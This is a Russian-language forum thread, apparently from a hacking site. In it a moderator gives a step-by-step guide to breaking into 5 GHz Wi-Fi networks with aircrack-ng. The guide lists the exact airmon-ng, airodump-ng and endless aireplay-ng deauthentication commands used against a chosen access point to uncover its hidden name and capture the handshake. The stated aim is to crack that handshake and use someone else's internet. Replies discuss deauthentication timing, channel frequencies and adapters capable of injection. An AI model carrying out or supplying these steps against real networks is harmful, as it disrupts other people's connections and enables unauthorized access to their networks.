Вардрайвинг 5 Ггц Wi-Fi сетей

Discussion in 'Беспроводные технологии/Wi-Fi/Wardriving' started by user100, 20 Mar 2014.

  1. user100

    user100 Moderator

    Joined:
    24 Dec 2011
    Messages:
    4,816
    Likes Received:
    18,492
    Reputations:
    377
    Вардрайвинг 5 Ггц Wi-Fi сетей
    Для вардрайвинга в сетях 5 Ггц нам понадобиться Wi-Fi адаптер и антенна поддерживающие работу в этих сетях (Ваш КО):
    У меня это Alfa AWUS051NH и 2х диапазонная антенна D-link ANT70-1000:
    [​IMG]
    Все работы будут проводиться с помощью стандартного пакета программ от Aircrack-ng 1.2 beta2

    Для начала запустим режим монитора на нашем адаптере (тут всё стандартно. Разве что у меня он mon2, а у Вас может быть любой другой):
    airmon-ng start wlan2

    Дальше осмотримся в эфире и посмотрим какие сети есть в диапазоне 5 Ггц:
    [​IMG]
    airodump-ng mon0 -C 5170-5825 --manufacturer
    Командой -C 5170-5825 указываем частоты в Мегагерцах каналов с 36 по 165.

    Посмотрим на результат:
    [​IMG]

    Как мы видим по результатам -все попавшиеся нам на 5 Ггц точки доступа имеют скрытый SSID .
    Ну что ж будем вскрывать. Я выбрал TP-Link поскольку на нем был клиент и сигнал от этой ТД самый хороший.
    Запустим airodump – ng на нужном нам канале (36) с захватом трафа в CAP файл :
    airodump-ng mon0 -C 5180 -w hide --manufacturer

    [​IMG]

    -C 5180 – Это наш 36 канал
    -w hide - Это команда на запись трафа в CAP файл с названием hide
    --manufacturer – это команда для информации о производители ТД.

    В месте с этим запускаем деатентификацию клиента от атакуемой скрытой ТД:
    aireplay-ng --deauth 0 -a F8:1A:67:FF:FF:FF mon0
    -a F8:1A:67:FF:FF:FF - это bssid нашей ТД
    --deauth 0 – команда на бесконечную деаутентификацию клиентов от атакуемой ТД

    Смотрим на результат атаки:
    [​IMG]

    Мы поймали hanshake и узнали имя скрытой сети: “Hide_Net” .

    Теперь остается расшифровать handshake (процедура стандартная, расписывать отдельно не буду) и пользоваться интернетом на 5Ггц.
     
    _________________________
    #1 user100, 20 Mar 2014
    Last edited: 28 Mar 2014
  2. cassper666

    cassper666 New Member

    Joined:
    8 Mar 2012
    Messages:
    34
    Likes Received:
    1
    Reputations:
    0
    Может немного не в тему:
    Вот всегда было интересно - если идет бесконечная деаутентификация, то как клиент, только что вылетевший с точки доступа, проходит аутентификацию, ведь постояно же идёт атака?
     
  3. comporg

    comporg Member

    Joined:
    6 May 2013
    Messages:
    535
    Likes Received:
    45
    Reputations:
    2
    ну выставь вместо 0 цифру 4
     
  4. user100

    user100 Moderator

    Joined:
    24 Dec 2011
    Messages:
    4,816
    Likes Received:
    18,492
    Reputations:
    377
    Клиент успевает переподключиться между деаутентификациями. Да и в место значеия "0" можно любое другое выставить.
     
    _________________________
  5. SlNik

    SlNik Active Member

    Joined:
    7 Feb 2014
    Messages:
    323
    Likes Received:
    136
    Reputations:
    1
    user100
    5180 - откуда известно, что это 36 канал?
     
  6. nsin

    nsin Member

    Joined:
    1 Feb 2013
    Messages:
    64
    Likes Received:
    16
    Reputations:
    5
    http://bwa.lgp.kz/rf_bwa.php
     
  7. Cooming_So0n

    Cooming_So0n New Member

    Joined:
    16 Feb 2011
    Messages:
    57
    Likes Received:
    4
    Reputations:
    0
    Как всегда очень ценная инфа. Спасибо.
     
  8. Vikhedgehog

    Vikhedgehog Elder - Старейшина

    Joined:
    24 Jul 2013
    Messages:
    367
    Likes Received:
    163
    Reputations:
    19
    Оказывается на 5 ГГц уже постепенно возникает жизнь))

    Скажите, есть ли смысл покупать оборудование если я живу на высоком этаже в центре крупного города? А еще, подскажите, какие 5ГГц адаптеры есть с поддержкой режима мониторинга кроме альфы? Мне не нужно чтоб была какая-то космическая сила выдачи, а просто чтоб можно было купить в каком нибудь крупном торговом центре для техники (не любюлю заказывать онлайн) и чтоб можно было прикрутить внешнюю антенну. Спасибо.
     
  9. user100

    user100 Moderator

    Joined:
    24 Dec 2011
    Messages:
    4,816
    Likes Received:
    18,492
    Reputations:
    377
    Для информации - у 5 ГГц радиус действия точек доступа меньше, чем у стандартных 2.4 Ггц и антенна нужна посильнее.
    Вот на вскидку 5ГГц адаптеры:
    PCMCIA:
    Ubiquiti SR71-C
    Atheros 9220 (b/g/n) / a/b/g/n
    Monitor Mode + Injection

    Expresscard:
    Ubiquiti SR71-X
    Atheros AR9280 / a/b/g/n
    Monitor Mode + Injection
    MiniPCI
    Mikrotik R52N
    Atheros AR9220 / a/b/g/n
    Monitor Mode + Injection

    MiniPCI-Express
    Ubiquiti SR71-E
    Atheros AR9280 ABGN
    Monitor Mode + Injection

    Ищите на Яндекс маркете.
     
    _________________________
    ertt likes this.
  10. SlNik

    SlNik Active Member

    Joined:
    7 Feb 2014
    Messages:
    323
    Likes Received:
    136
    Reputations:
    1
    Как ни странно моя антенна D-Link ANT24-1800 расчитанная на диапазон 2.4 – 2.5 ГГц прекрасно ловит 5 ГГц с Alfa AWUS051NH. И расстояние судя по всему порядка 1 км. Сетей много, все открытые. Сделать ни чего не могу. Уже задовал вопрос в смежной теме.
     
    #10 SlNik, 22 Mar 2014
    Last edited: 22 Mar 2014
    ertt likes this.
  11. DemDot

    DemDot New Member

    Joined:
    9 Apr 2011
    Messages:
    42
    Likes Received:
    2
    Reputations:
    1
    Не пробовали утилиту wifite для осмотра?
    Когда точек много, все на экран не помещаются, она выручает. К тому же сама запускает режим мониторинга, может mac адаптера подменять. Советую
     
    #11 DemDot, 25 Mar 2014
    Last edited: 25 Mar 2014
  12. comporg

    comporg Member

    Joined:
    6 May 2013
    Messages:
    535
    Likes Received:
    45
    Reputations:
    2
    Когда точек много, выручают клавиши A и D
     
  13. SELF47

    SELF47 Banned

    Joined:
    15 Feb 2018
    Messages:
    5
    Likes Received:
    0
    Reputations:
    0
    В месте с этим запускаем деатентификацию клиента от атакуемой скрытой ТД:
    aireplay-ng --deauth 0 -a F8:1A:67:FF:FF:FF mon0
    [/QUOTE]
    У меня в результате: "No such BSSID available". :(
     

    Attached Files:

Loading...